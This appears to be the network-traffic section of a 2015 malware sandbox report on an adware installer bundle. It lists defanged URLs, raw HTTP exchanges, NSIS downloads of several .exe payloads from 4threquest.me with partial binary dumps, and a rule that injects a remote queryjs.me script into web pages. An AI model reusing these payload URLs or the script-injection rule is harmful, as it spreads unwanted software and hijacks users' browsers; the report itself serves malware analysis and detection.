hxxp://up.soft365.com/Fan/rebirth?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&ptid=pcm&ver=4.0.1.1716&dname=istartsurf | |
hxxp://cdn1.downloadcrest.com/V19/amipb.js | |
hxxp://www.related.deals/services/rules?dummy=212 | |
hxxp://www.amoninst.com/index.php | |
hxxp://www.4threquest.me/310714d/310714_gs.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://www.4threquest.me/010914s/010914i.htm | |
hxxp://install.plainsavingscenter.com/ii?alpha=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 | |
hxxp://www.amoninst.com/finalize.php | |
hxxp://www.amoninst.com/namen.php | |
hxxp://www.4threquest.me/registro/carregando.gif | |
hxxp://www.downloadcrest.com/tdownload.php | |
hxxp://www.related.deals/services/update/1.0.0/iCQPRHeOJjIUg2xbskzYtHYRcOspD6WL/120 | |
hxxp://4threquest.me/310714d/310714_am2.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://4threquest.me/310714d/310714_a9.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://www.mobimidia.com/mobile/libacess_js.php?idm=R0JDNlBNS1RPRDo5MjMwMDA= | |
hxxp://4threquest.me/310714d/240714_ps.exe?aleaTokenID=q2g54WndLShXYB3BIA5JVfobjOB2Nq2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://e0.extreme-dm.com/s9.g?login=pcofferp&jv=y&j=y&srw=1276&srb=32&l=http://www.4threquest.me/registro/310113f8.htm | |
hxxp://www.4threquest.me/registro/icone_cadeado.gif | |
hxxp://www.4threquest.me/010914s/verificar_ip.php | |
hxxp://www.mobimidia.com/mobile/MobiMidia_validation.js | |
hxxp://www.4threquest.me/310714d/310714_br.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://install.plainsavingscenter.com/mg?alpha=HyZPRnotGAhqT14bYGx1HmIcS3ofYE03fWFKOXdhHXUOIX0+L1I0EmhiTjJaMDJXZwQZUlU2MQZRaxkdDC51SwhncVMJcU8OQzZrVi9y | |
hxxp://www.brsoftwarellc.com/services/rules.txt?dummy=504 | |
hxxp://www.mobimidia.com/mobile/mt-core.js | |
hxxp://install.plainsavingscenter.com/fp?alpha=UHAKO1kqRR0MZFxoJRFWUTRZNllQLBxKGHdxWy8GFiAEb0pGWwdKP1BGZToMDnt+bFElG2A/bkprKRY8VzgCOSk8BjouWnBZH08abykoWDgPbRFvGER0QkZRIhoKekJQIFMwXQwKCkk3WjsQPBUNbg9vI1cCYToaUXdbZ01DdzVlIlgPD3YdVDEZOBwoJGxSXQJuWXoCF2ULRklwHhhwQUtwUz1YVxwLRCdTOwZsDBxlWX52WRZnOQ0eK1YHFwpwKGJnLhYddAdfc0BhW3UlP0UndhgaOEcSeF1HWCceDnlHQHAVcVFrQBwIcgtmGz99C2ALGiBWGxA4HD1rUmM5VTgHPitMb0kuXghdGD16X3l/VWUORzlZXjw= | |
hxxp://www.brsoftwarellc.com/services/update.php?v=1.0.0&key=ExkGaOfgf143vIy6PGcdsVIG3GG3xUSB&dummy=153 | |
hxxp://www.4threquest.me/310714d/291014_nj.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N | |
hxxp://install.plainsavingscenter.com/if?alpha=VmkaOm5eUxUWBXAqNRBhVy1JN25WNRYSY3NRW24hCWxLOjpDVRcsXAVyWCxcWzlGMUUVCS1+eQgWH2t6Uz1jJBg8dVkgdgY2CT85LH81F2FVJHM4ZAMsThQsNkRPdXVYOjJfbAcXBz0CIF4bODl/eQIdYyUdaUwuTG0/FHFWTRM5aS4+CysLX2BQY0J0MCgvNUgpfyxrBD8XUDNmChxuNF06Ri1uHRUeUgFSNQc/Ogp9GXlGA0kGenNHNh4uOA9jJG8ObD4OVCpYUwE5JSp3bl1sFGsZbjNCehgTMVxYS3UXMy4Zby9KVU9BZw11UmN4SWMPbBBLTS18OhUsDTM6XkE/aVpnKAdwLBdSVWFvdS4vRAR0ZXwpbRY5DAU3f1lJJGIWbQRvMlxLCkYQUTUHIj0Mfx9/UQNdMmF/H38LNysILGwqGyZrTnkrW2RSaDZfNzsINVctDHNXHjULEzowZFwpNgV7Xzo1RRgeWl5Wawt1KVs5EmYSSh50OjoXPkZmeFk8FTAaMWFbUGJ0PAY8OzwpMwBhYiRAKGdWOBAbMC1zZhcMIS4SczZQGG4/bypaEGh7BxliKEMUSmRedQgrDjckQ0USTwhAOhpyeHN3VXlufnIFLnojEQ== | |
hxxp://www.related.deals/services/stores?dummy=526 | |
hxxp://www.amoninst.com/thankyou.php | |
hxxp://www.4threquest.me/registro/top-line.gif | |
IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)
Traffic
GET /mobile/MobiMidia_validation.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.mobimidia.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Date: Thu, 23 Apr 2015 07:23:56 GMT
Server: Apache
Last-Modified: Sun, 27 Oct 2013 16:29:25 GMT
ETag: "1b34285-23a2-4e9bb7c92e340"
Accept-Ranges: bytes
Content-Length: 9122
Connection: close
Content-Type: application/x-javascript
if (ID_MobiMidia_Serv != '') {. . ApiBlock = false;. //document.write(unescape(""));. . document.write(unescape(""));. . . . document.write(unescape(""));. function MobiMidia_addOption(selectId, txt, val, selected) {..var objOption = new Option(txt, val, selected);..self.document.getElementById(selectId).options.add(objOption);. }. function MobiMidia_keyNumber(e) {. if (e.keyCode != 9 && e.keyCode != 13) {. var keyChar = String.fromCharCode(e.which ? e.which : e.keyCode);. filteredValues = "1234567890";. if ((filteredValues.indexOf(keyChar) == -1) && ((keyChar.charCodeAt(0) != 8)&&(keyChar.charCodeAt(0) != 46)&&(keyChar.charCodeAt(0) != 37)&&(keyChar.charCodeAt(0) != 38)&&(keyChar.charCodeAt(0) != 39)&&(keyChar.charCodeAt(0) != 40)) ) return false;. }. }. function MobiMidia_AtivaCel() {. if (self.document.getElementById('MobiMidia_DDD').value.length == 2) {. self.document.getElementById('MobiMidia_Number').focus();. }. }. . function MobiMidia_NonoDigito() {. if (self.document.getElementById('MobiMidia_DDD').value < 30) {.
<<< skipped >>>
GET /310714d/310714_br.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:34 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 1112281
Content-Description: File Transfer
Content-Disposition: attachment; filename="310714_br.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......................................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc................v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /310714d/291014_nj.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:38 GMT
Content-Type: application/force-download
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Content-Length: 1849280
Content-Description: File Transfer
Content-Disposition: attachment; filename="291014_nj.exe"
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......................................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc................v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /310714d/310714_gs.exe?q2g54WndLShXYB3BIA5JVfobjOB2N=q2g54WndLShXYB3BIA5JVfobjOB2N HTTP/1.1
User-Agent: NSIS_Inetc (Mozilla)
Host: VVV.4threquest.me
Connection: Keep-Alive
Cache-Control: no-cache
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:46 GMT
Content-Type: application/octet-stream
Content-Length: 1112379
Last-Modified: Thu, 23 Apr 2015 07:24:03 GMT
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................\..........<2.......p....@..........................................................................s.......................................................................................p...............................text...ZZ.......\.................. ..`.rdata.......p.......`..............@..@.data................r..............@....ndata.......@...........................rsrc................v..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H.....>B..H.P.u..u..u...Hr@..B...SV.5.>B..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h.6B.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$...>B...Si.....VW.T.....tO.q.3.;5.>B.sB..i......D.......t.G.....t...O..t .....u...3....3...F.....;5.>B.r._^[..
<<< skipped >>>
GET /010914s/verificar_ip.php HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:56 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.4.30
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
X-Cache: BYPASS
CC: UA
Content-Encoding: gzip
18............s.......X.......0..HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Thu, 23 Apr 2015 07:24:56 GMT..Content-Type: text/html..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.4.30..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requested-With..X-Cache: BYPASS..CC: UA..Content-Encoding: gzip..18............s.......X.......0..
GET /services/rules.txt?dummy=504 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.brsoftwarellc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:32 GMT
Content-Type: text/plain
Content-Length: 94
Connection: keep-alive
Last-Modified: Fri, 13 Feb 2015 14:24:53 GMT
ETag: "5ac277-5e-50ef8fffcf740"
Cache-Control: max-age=600
Expires: Thu, 23 Apr 2015 07:34:32 GMT
P3P: CP="Potato"
X-Cache: MISS
X-Server: Provided by Intermedia
X-Country: EU
Accept-Ranges: bytes
</body>|<script src="//queryjs.me/services/script.js" type="text/javascript"></script></body>.HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 2015 07:24:32 GMT..Content-Type: text/plain..Content-Length: 94..Connection: keep-alive..Last-Modified: Fri, 13 Feb 2015 14:24:53 GMT..ETag: "5ac277-5e-50ef8fffcf740"..Cache-Control: max-age=600..Expires: Thu, 23 Apr 2015 07:34:32 GMT..P3P: CP="Potato"..X-Cache: MISS..X-Server: Provided by Intermedia..X-Country: EU..Accept-Ranges: bytes..</body>|<script src="//queryjs.me/services/script.js" type="text/javascript"></script></body>.....
GET /services/update.php?v=1.0.0&key=ExkGaOfgf143vIy6PGcdsVIG3GG3xUSB&dummy=153 HTTP/1.0
Accept: */*
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.brsoftwarellc.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:24:33 GMT
Content-Type: text/html
Content-Length: 0
Connection: keep-alive
P3P: CP="Potato"
X-Cache: BYPASS
X-Server: Provided by Intermedia
X-Country: EU
HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 2015 07:24:33 GMT..Content-Type: text/html..Content-Length: 0..Connection: keep-alive..P3P: CP="Potato"..X-Cache: BYPASS..X-Server: Provided by Intermedia..X-Country: EU..
GET /registro/icone_cadeado.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.4threquest.me
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:25 GMT
Content-Type: image/gif
Content-Length: 2256
Last-Modified: Mon, 08 Dec 2014 13:27:40 GMT
Connection: keep-alive
Expires: Sat, 23 May 2015 07:24:25 GMT
Cache-Control: max-age=2592000
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Accept-Ranges: bytes
GIF89a(.2....aH........z......i........r........X..7.......................8.. .....x..g.................?.....7..E.....n....f...^..$..H..............[........2...........:...........z.......m...W..l.................... ...................\........h..h4.p......*...........4.............. ..............u.....3........K....{(.....(...........#.....i..J..b..........m........o.....................N.................l.....#................c.................|..........I0............>....{.........N.|=.m$..........w(..E.......L...[.s.%...a..g*..........v...3.s........~..o .......................=..>....m...Z.....x...........1........g........d......9*..............._....................z..t..}........L..Y..B.....J..&.....0......................z>.. .q ...........E.|.............!.......,....(.2........H..?;2n}.....|....H.....S...1..9),...F.-.(7&..b.K...u..1...vn.z)RF....5.!..B!...L...-.........d.6.h.....2..h.&.?.1.&... .X1r..!D..da..t;0.7|s...*.lH.....U...........?.......p....HK..r...jp...(e.........y.c.........mT.d$q.. (....G.d..P...S..)f..D........Td.;tw.`!...#..C a.....0..z....Z..r..V.0.1.x3.?....(.6..l..C..y8"..N...=.L1B'....._....3|@.6#...8.(`......,.....;@QB#..BL..$.d7.L0..A...:60..8.|@...l0........hA...<"..I......R..tt.O.'.aH..).%!...@.Gx.........(..3W....0xP.$".P.............X`*.......^.J....!. ........G..t..........j...<.."..A.......i.QJ.......jI\l.Zp....k..........-.R....Yd.J.........n.?..H....D..DAo..jB_vJ.z.%................'lF.......R...]d..".*;0"H.`....@r... .@d@...C.mt.......dp.....3.=k..@
<<< skipped >>>
GET /010914s/010914i.htm HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Connection: Keep-Alive
Host: VVV.4threquest.me
HTTP/1.1 200 OK
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:26 GMT
Content-Type: text/html
Last-Modified: Mon, 08 Dec 2014 13:27:43 GMT
Transfer-Encoding: chunked
Connection: keep-alive
Access-Control-Allow-Origin: *
Access-Control-Allow-Headers: X-Requested-With
CC: UA
Content-Encoding: gzip
2de.............Tmo.0..L~.wHlSI.....[...` (.|Bnri\.... ....N...D?4.....s.99...\~y.`...i..(3.Th$.L...k...lj........~'.....h..B...P].........4...(S..S....7.uE....A..}..P.!c.u@(..0..s.~>...0..*...Z Y..7v..N..Y{C..).=a._._.....rq......M.'x.....u:...V.J.....-Z.&..md.z.2..Z~..HN.Hc..25....H.i.~S.&J..7-.....Z.i...) .Zm...Q3...aV..*.....-`...........0.........^....b.*`.$...--......tu.j...toe/..j../V.,.M.F....l.5..w..7...gb..6........-V....y..s....x...^.w....#jj"...........m...k...4..d.^Q...\..RI......v".ck.*..Zu..3QJ....8..hi\.r]bvr*..x.....r.EM..U&..Xh3...9%.~..k..h.|...).v...v...vZ.<.. .9.#..]..!.x...a...D.A.......Y........8g....v.P.c7.;M.i..w.$.:nO.....A..A..).>.G.x9Nog...:;:.. ...@ '{.\o.U9..n.=Hj(...^...J8.;....g............`...G.....0..HTTP/1.1 200 OK..Server: nginx/1.0.15..Date: Thu, 23 Apr 2015 07:24:26 GMT..Content-Type: text/html..Last-Modified: Mon, 08 Dec 2014 13:27:43 GMT..Transfer-Encoding: chunked..Connection: keep-alive..Access-Control-Allow-Origin: *..Access-Control-Allow-Headers: X-Requested-With..CC: UA..Content-Encoding: gzip..2de.............Tmo.0..L~.wHlSI.....[...` (.|Bnri\.... ....N...D?4.....s.99...\~y.`...i..(3.Th$.L...k...lj........~'.....h..B...P].........4...(S..S....7.uE....A..}..P.!c.u@(..0..s.~>...0..*...Z Y..7v..N..Y{C..).=a._._.....rq......M.'x.....u:...V.J.....-Z.&..md.z.2..Z~..HN.Hc..25....H.i.~S.&J..7-.....Z.i...) .Zm...Q3...aV..*.....-`...........0.........^....b.*`.$...--......tu.j...toe/..j../V.,.M.F....l.5..w..7...gb..6........-V....y..s....x...^.w....#jj"...........
<<< skipped >>>
GET /i.gif HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/010914s/010914i.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: t1.extreme-dm.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.7.10
Date: Thu, 23 Apr 2015 07:23:55 GMT
Content-Type: image/gif
Content-Length: 1004
Last-Modified: Thu, 26 Feb 2004 13:56:07 GMT
Connection: close
ETag: "403dfaf7-3ec"
Expires: Fri, 24 Apr 2015 07:23:55 GMT
Cache-Control: max-age=86400
Accept-Ranges: bytes
GIF89a).&..>...............!..5&..*))%.9..J..N..k..n*(U)%p*.VQ%%X."c&QPLLtttjhfaMf...$.....-&.9B.1B.S .ww.ii.RM.RM.po.dk.s...11.el.ZZ.c..a..{..y...{.........................................................!.....@.,....).&....@.pH,..H.o.l:..(S.KZ.G..............j.... pwX.....@.....-...cuHwy`..~......~-...[El.}...........*~...E.E`./..... ......Y.C........"."..10...% .B.Bz.-........."22442.1/'6L<%g....0.......B,.A. .e7v.0...........C....e..P...9p..1........1 .>F.0.@.QC.. u.H.b../...@.a.^.a.\. ..X...l.......7d.8...............hB..3G..Wc0Ci..=.C..<;....lsZ....2.7..y.g/F..2.e.1...;V<..".....gj..,d..).@.#...=^....B .zK...q-...q.......cD..r.b...2>...D...x.X&.F....c...,.Z..2..#.v..@t.....`.Z,=.^2..>..Av8...$......@`B........G!...`..-..BD6.......g...<...=D....l..........@......1.H.........0........>...>........B...........G...h....yUJ`...5...W.....|..PE1.&./X`A... .E...Y.(...Q.I0......ffAW....p......Q.\u..,....5...~..7..&.@.....AB.-.A........2....`.......nDK...,..._d...xq.m........k...........n.A..;..
GET /Fan/rebirth?uid=VMwareXVirtualXIDEXHardXDrive_00000000000000000001&ptid=pcm&ver=4.0.1.1716&dname=istartsurf HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: up.soft365.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 23 Apr 2015 07:25:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Vary: Accept-Encoding
X-Powered-By: PHP/5.2.14p1
Content-Encoding: gzip
14........................0..
GET /v4/searchprotect/VMwareXVirtualXIDEXHardXDrive_00000000000000000001?action0=xa.geoip&action1=visit&action2=install HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 9.0; Windows NT 6.1; Trident/5.0) in my heart of heart.
Host: xa.xingcloud.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx/1.6.2
Date: Thu, 23 Apr 2015 07:25:01 GMT
Content-Type: text/html; charset=utf-8
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.3.3
xa-api-version: v4
48..{"stats":"ok","time":"0.93 ms","message":"store 4 action and 0 update "}..0..HTTP/1.1 200 OK..Server: nginx/1.6.2..Date: Thu, 23 Apr 2015 07:25:01 GMT..Content-Type: text/html; charset=utf-8..Transfer-Encoding: chunked..Connection: keep-alive..X-Powered-By: PHP/5.3.3..xa-api-version: v4..48..{"stats":"ok","time":"0.93 ms","message":"store 4 action and 0 update "}..0..
GET /V19/amipb.js HTTP/1.1
Accept: */*
Referer: hXXp://VVV.amoninst.com/index.php
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: cdn1.downloadcrest.com
Connection: Keep-Alive
HTTP/1.1 200 OK
Content-Type: application/x-javascript
Content-Length: 61399
Connection: keep-alive
Date: Thu, 19 Feb 2015 14:38:57 GMT
Last-Modified: Thu, 19 Feb 2015 14:37:18 GMT
ETag: "52bb6eb78bfd9436ad34be6fc97eae8c"
Accept-Ranges: bytes
Server: AmazonS3
Age: 59352
X-Cache: Hit from cloudfront
Via: 1.1 182f7fa5c3814caf19acb317d3eb85ad.cloudfront.net (CloudFront)
X-Amz-Cf-Id: nKgID5Yc-nIdvrx0eIsp9odtdHN-L9j0CNw7KuZU3PL21uaF8Ka0aw==
..//<!-- ../* Progress bar */..var g_AmiPbs = new Array();..var g_AmiPbsEx = new Array();..var g_interval = 0;..var g_initComp = 0;..var g_possibleComps = [];..var g_reportedComps = [];..var g_removedComps = [];....function LogMessage(message) {.. try {.. g_ami.Log(message);.. }.. catch (excpt) { }..}..function IsDeclined(name) {.. var declined = 0;.. for (var i = 0; i < g_removedComps.length; i ) {.. if (g_removedComps[i] == name) {.. declined = 1;.. break;.. }.. }.. return declined;..}..function UpdateSkipStatus(sn) {.. if (g_testa && !ArrayContains(g_notest, sn) && !ArrayContains(g_notest1, sn)) {.. if (g_testa.constructor != Array || ArrayContains(g_testa, sn)) {.. g_ami.WriteProfileString(g_testf, '', sn, 'S');.. }.. }..}..function ShortNameFromName(name) {.. for (c = 0; c < g_comps.length; c ) {.. if (g_comps[c].name == name) {.. return g_comps[c].sn;.. }.. }.. return name;..}..function UpdateComponentsStatus() {.. LogMessage('UpdateComponentsStatus function started');.. for (var j = 0; j < g_possibleComps.length; j ) {.. var reported = 0;.. if (g_possibleComps[j].sn == 'updater') {.. continue;.. }.. for (var i = 0; i < g_reportedComps.length; i ) {.. if (g_reportedComps[i].sn == g_possibleComps[j].sn) {.. reported = 1;.. break;.. }.. }.. if
<<< skipped >>>
GET /3517/1 HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.tjepgz.cc
Connection: Keep-Alive
HTTP/1.1 302 Moved Temporarily
Server: nginx
Date: Thu, 23 Apr 2015 04:23:40 GMT
Content-Type: text/html
Transfer-Encoding: chunked
Connection: keep-alive
X-Powered-By: PHP/5.2.14
Location: hXXp://VVV.tjepgz.cc/files/zip_r3/3517_285376eeff6d14f058406e7986125234/1.zip
0......
GET /files/zip_r3/3517_285376eeff6d14f058406e7986125234/1.zip HTTP/1.1
Accept: */*
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.tjepgz.cc
Connection: Keep-Alive
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 23 Apr 2015 04:23:40 GMT
Content-Type: application/zip
Content-Length: 2211012
Last-Modified: Tue, 14 Apr 2015 08:23:03 GMT
Connection: keep-alive
ETag: "552cce67-21bcc4"
Accept-Ranges: bytes
PK...........F.v9t............479.json.....qv.B..[.:?..y....xL..@a......w..sN.....^.9....'.t.."....u...........N5..g(.......{.)..Q.!..Dk..zef....s.{.kM.S.*:.......6|.&...M..ZWYr.....uA....R/..,...0..........g..]V3..n.`...}..g_j.......i.n..;.........Ts..C......o.l.'7u..........l...z.ZJ......S"Z....f....W..m..^....$m.=...O.Z...k.=..i...`_...;......kV........V..8?V.;...*......EF...^'...?*..n.r&....o..wv..}\S.,......N....4.w...6.......:....s..)......C.eg..4..........~........P.F.E.i....0......c.....9..feKn.q.x......y...................". /..PK...........F.........<......uninstallDlg2.xml.[m..6..~@..........v.b.....4..Z..".%.fW&U......7.(Y...\s.].v.X.4.....3b..._%....r6...m!.".S..Z...gl.Lb...32..Hf..^.....)........O..;q-..T.....z6.......s.p1.>.........|....1..Y......%; t..xjI...Q...M.9N2.<;@.~.p....\..A....\..u.....Q%...u..e.... ..'9\........\~.. .!I......v....x.t_D.$Bw0.V.......4..8...Es....0L..lF..ET..8... p.k-x..qR.....~Kn.gK..'.d....%;...%GK..B.k.[.w....H.$y.Em.R...:Y.....l.v#..(.d.....ntgA....4.j.{m.W.3V.=.O(.c....P.WT:X.?2.E.....>..k...=......7b~.]..`.....(.............2_.L......:@...F...M......1..".9X.....c.!3H%...d...41E2./H...p....R.3........1`.......@....W.......2.....e..1n.,.-C..2..)f....M.@...N...<....r9..../.],!.*...M9..cO.h..c..Fr..`......3....<..Q....V.*.~.....5....S...I..nj..Q.A.. .....bn.2!.9$ .....U%.....p....v.-*.. *C7{...F......4wj..2...2.k....tU'63....r.m.~............a.S....W..V ...z..u.~.s...gg...Z\q..'F.8..Rm..V.kT.. E^X)j..QU*>y..\.j.....$...x.=.....kI.-..p.......:....
<<< skipped >>>
GET /8Hk4o HTTP/1.1
Accept: */*
Referer: hXXp://VVV.4threquest.me/registro/310113f8.htm
Accept-Language: en-us
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)
Host: VVV.nowtake.me
Connection: Keep-Alive
HTTP/1.1 301 Moved Permanently
Server: nginx/1.0.15
Date: Thu, 23 Apr 2015 07:24:25 GMT
Content-Type: text/html
Content-Length: 185
Connection: keep-alive
Location: hXXp://VVV.4threquest.me/010914s/010914i.htm
Access-Control-Allow-Origin: *
